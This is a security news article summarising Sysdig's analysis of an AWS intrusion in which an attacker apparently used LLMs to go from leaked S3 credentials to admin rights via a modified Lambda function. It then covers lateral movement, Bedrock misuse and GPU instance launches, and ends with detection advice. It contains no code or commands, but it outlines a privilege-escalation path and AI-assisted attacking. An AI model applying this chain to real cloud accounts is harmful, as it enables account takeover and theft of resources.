3 min Security

Attackers exploit LLMs to gain admin rights in AWS

Attackers exploit LLMs to gain admin rights in AWS

Security researchers at Sysdig warn that attackers can quickly take over AWS environments using large language models. Their latest analysis shows that AI is already being used to automate cloud attacks, accelerate them, and make them harder to detect.

The Sysdig Threat Research Team bases these conclusions on an attack that began on November 28, 2025. In this case, an attacker gained initial access and escalated to full administrator rights within an AWS account in less than ten minutes. The researchers reconstructed the entire attack chain and linked it to concrete detection and mitigation guidance for organizations seeking to better protect their cloud environments.

The attack began with login credentials left in publicly accessible S3 buckets. These buckets contained RAG data for AI models and were linked to an IAM user with sufficient Lambda permissions to be exploited. The attacker used those rights to modify the code of an existing Lambda function. The new code generated access keys for an admin user and returned them directly via the Lambda response.

According to Sysdig, the malicious code’s structure, including Serbian comment lines and extensive error handling, strongly suggests the use of an LLM. Because the Lambda function ran with an execution role with extensive permissions, the attacker was able to indirectly obtain administrative privileges without traditional privilege escalation via IAM roles.

Attacker spreads access across large number of principals

The attacker then moved laterally through the account. A total of nineteen different AWS principals were used, including existing IAM users for whom new access keys were created. A new admin user was also added to ensure access is persistent. It is noteworthy that the attacker attempted to assume roles in accounts that did not belong to the organization, which, according to the researchers, is consistent with patterns seen in AI-generated actions.

Attention then shifted to Amazon Web Services’ Amazon Bedrock service. The attacker first checked whether model logging was active, then invoked multiple AI models. This fits in with an attack technique that Sysdig previously referred to as LLMjacking, in which cloud models are misused for personal gain. A Terraform script was even uploaded that could roll out a public Lambda backdoor to generate Bedrock credentials.

Later, the attacker attempted to launch large GPU instances for machine learning workloads. Ultimately, a costly p4d instance was launched with a publicly accessible JupyterLab server as an alternative gateway. The installation script referenced a non-existent GitHub repository, again indicating that a language model was used to compose the attack.

According to Sysdig, this case shows how the threat landscape is changing. Attackers no longer need in-depth knowledge of an environment when a language model can generate scripts, perform reconnaissance, and make real-time decisions. The report emphasizes that organizations must pay close attention to unusual model calls, massive resource enumeration, and the abuse of Lambda permissions.

The researchers conclude that AI is not only a tool for defenders, but has also become a powerful weapon in the hands of attackers.